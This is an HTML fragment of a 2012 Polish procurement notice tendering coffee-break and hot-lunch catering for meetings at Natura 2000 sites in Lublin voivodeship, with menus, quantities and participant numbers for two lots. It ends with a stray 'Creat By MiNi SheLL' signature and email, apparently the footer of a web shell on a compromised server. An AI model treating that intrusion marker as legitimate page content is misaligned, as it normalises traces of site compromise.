<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje: 
1.1. Przerwa kawowa (w godzinach 11-13) w formie szwedzkiego stołu,
            w menu:
1)napoje: świeżo parzona kawa, herbata, cukier, cytryna, śmietanka do kawy; 3 rodzaje soków owocowych nie zawierających cukru i środków konserwujących (np.: wieloowocowy, pomarańczowy, jabłkowy), woda mineralna gazowana i niegazowana,
2)4 rodzaje kruchych ciastek (po 4 szt./osobę),
3)słone paluszki (po 1 opakowaniu /2 osoby),
4)owoce: owoce sezonowe, banany, winogrona.

1.2.  Obiad (o godzinie 14):
1)Obiad powinien być serwowany w formie przygotowanych porcji - 1 dla każdej osoby. Obiadowy składa się drugiego dania (danie `jednogarnkowe`) np. fasolka po bretońsku, gulasz, bouef strogonow, bigos, oraz deseru:
a) danie obiadowe:
- danie jednogarnkowe - (min. 400g/1 porcja) + pieczywo (min. 100g/1 osobę)
- 2 rodzaje soków owocowych nie zawierających cukru i środków konserwujących (np.;wieloowocowy, pomarańczowy, jabłkowy), woda mineralna gazowana i niegazowana,
b) deser: 
- 2 rodzaje ciast domowych: np.: sernik, jabłecznik, makowiec, ciasto
z owocami (1 szt./osobę) - min.100 g na osobę.
2)Obiad musi być serwowany gorący,
3)Wykonawca zapewnia zastawę ceramiczną lub porcelanową z użyciem sztućców platerowych, serwetki papierowe i materiałowe oraz obrusy materiałowe.
4)Wykonawca zapewni zestawy przyprawowe (sól, pieprz).
5)Wykonawca musi zapewnić różnorodność składników, tak aby poczęstunek był urozmaicony i smaczny.

Wybór dania obiadowego należeć będzie do Zamawiającego z listy stanowiącej załącznik nr 1 do SIWZ, którą Wykonawca zobowiązany jest dołączyć do oferty - Wykonawca zobowiązany jest do podania 5 dań obiadowych.


2.Ilość napojów na spotkaniu: 
1) świeżo parzona kawa, herbata, cukier, cytryna, śmietanka do kawy - bez
     ograniczeń na osobę; 
2) 3 rodzaje soków owocowych nie zawierających cukru i środków
     konserwujących ( np.: wieloowocowy, pomarańczowy, jabłkowy) - 0,5 l/osobę;
3)  woda mineralna gazowana i niegazowana 0,5 l/osobę. Opakowania a`1/2 l.
3.Wykonawca zobowiązany jest we własnym zakresie odebrać i zagospodarować odpady spożywcze (pokonsumpcyjne) powstałe w trakcie świadczenia usługi. Odpowiada za transport przedmiotu zamówienia oraz podanie go zgodnie
z wymaganiami sanitarnymi dotyczącymi żywności i żywienia, w szczególności zobowiązany jest do przestrzegania wymagań określonych w ustawie
o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (Dz. U. z 2006 r. nr 171, póz. 1225 z późn zm.), oraz posprzątaniem pomieszczenia, w którym spożywano posiłek.
4.Usługa cateringowa będzie świadczona w miejscach spotkań Zespołów Lokalnej Współpracy wymienionych w pkt. 3.1.
5.Szacunkowa ilość uczestników wszystkich spotkań wynosi 980 osób (36 spotkań) 
6.Spotkania zostaną zorganizowane w dni robocze i będą trwać od 6 do 10 godzin.
7.Jednego dnia mogą się odbywać spotkania Zespołów Lokalnej Współpracy dla 1 lub 2 obszarów - dla każdej części oddzielnie. 
8.Spotkania Zespołów Lokalnej Współpracy odbywać się będą od daty zawarcia umowy do dnia 15 listopada 2012 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.52.00.00-1, 55.32.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - usługa cateringowa dla następujących 7 obszarów sieci Natura 2000 w województwie lubelskim, takie jak: a)Wierzchowiska PLH060069, b)Polichna PLH060078, Gościeradów PLH060007, Świeciechów PLH060082, c)Komaszyce PLH060063, d)Przełom Wisły w Małopolsce PLH060045, Małopolski Przełom Wisły PLB140006.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje: 
1.1. Przerwa kawowa (w godzinach 11-13) w formie szwedzkiego stołu,
            w menu:
1)napoje: świeżo parzona kawa, herbata, cukier, cytryna, śmietanka do kawy; 3 rodzaje soków owocowych nie zawierających cukru i środków konserwujących (np.: wieloowocowy, pomarańczowy, jabłkowy), woda mineralna gazowana i niegazowana,
2)4 rodzaje kruchych ciastek (po 4 szt./osobę),
3)słone paluszki (po 1 opakowaniu /2 osoby),
4)owoce: owoce sezonowe, banany, winogrona.

1.2.  Obiad (o godzinie 14):
1)Obiad powinien być serwowany w formie przygotowanych porcji - 1 dla każdej osoby. Obiadowy składa się drugiego dania (danie `jednogarnkowe`) np. fasolka po bretońsku, gulasz, bouef strogonow, bigos, oraz deseru:
a) danie obiadowe:
- danie jednogarnkowe - (min. 400g/1 porcja) + pieczywo (min. 100g/1 osobę)
- 2 rodzaje soków owocowych nie zawierających cukru i środków konserwujących (np.;wieloowocowy, pomarańczowy, jabłkowy), woda mineralna gazowana i niegazowana,
b) deser: 
- 2 rodzaje ciast domowych: np.: sernik, jabłecznik, makowiec, ciasto
z owocami (1 szt./osobę) - min.100 g na osobę.
2)Obiad musi być serwowany gorący,
3)Wykonawca zapewnia zastawę ceramiczną lub porcelanową z użyciem sztućców platerowych, serwetki papierowe i materiałowe oraz obrusy materiałowe.
4)Wykonawca zapewni zestawy przyprawowe (sól, pieprz).
5)Wykonawca musi zapewnić różnorodność składników, tak aby poczęstunek był urozmaicony i smaczny.

Wybór dania obiadowego należeć będzie do Zamawiającego z listy stanowiącej załącznik nr 1 do SIWZ, którą Wykonawca zobowiązany jest dołączyć do oferty - Wykonawca zobowiązany jest do podania 5 dań obiadowych.


2.Ilość napojów na spotkaniu: 
1) świeżo parzona kawa, herbata, cukier, cytryna, śmietanka do kawy - bez
     ograniczeń na osobę; 
2) 3 rodzaje soków owocowych nie zawierających cukru i środków
     konserwujących ( np.: wieloowocowy, pomarańczowy, jabłkowy) - 0,5 l/osobę;
3)  woda mineralna gazowana i niegazowana 0,5 l/osobę. Opakowania a`1/2 l.
3.Wykonawca zobowiązany jest we własnym zakresie odebrać i zagospodarować odpady spożywcze (pokonsumpcyjne) powstałe w trakcie świadczenia usługi. Odpowiada za transport przedmiotu zamówienia oraz podanie go zgodnie
z wymaganiami sanitarnymi dotyczącymi żywności i żywienia, w szczególności zobowiązany jest do przestrzegania wymagań określonych w ustawie
o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (Dz. U. z 2006 r. nr 171, póz. 1225 z późn zm.), oraz posprzątaniem pomieszczenia, w którym spożywano posiłek.
4.Usługa cateringowa będzie świadczona w miejscach spotkań Zespołów Lokalnej Współpracy wymienionych w pkt. 3.1.
5.Szacunkowa ilość uczestników wszystkich spotkań wynosi 550 osób (19 spotkań) 
6.Spotkania zostaną zorganizowane w dni robocze i będą trwać od 6 do 10 godzin.
7.Jednego dnia mogą się odbywać spotkania Zespołów Lokalnej Współpracy dla 1 lub 2 obszarów - dla każdej części oddzielnie. 
8.Spotkania Zespołów Lokalnej Współpracy odbywać się będą od daty zawarcia umowy do dnia 15 listopada 2012 r.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.52.00.00-1, 55.32.20.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com